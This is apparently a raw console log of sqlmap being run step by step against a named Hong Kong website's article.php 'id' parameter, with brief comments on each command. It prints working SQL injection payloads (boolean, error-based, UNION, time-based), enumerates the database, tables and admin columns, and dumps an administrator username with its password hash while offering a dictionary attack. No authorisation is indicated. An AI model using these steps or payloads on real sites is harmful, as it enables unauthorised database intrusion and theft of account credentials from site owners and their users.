starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>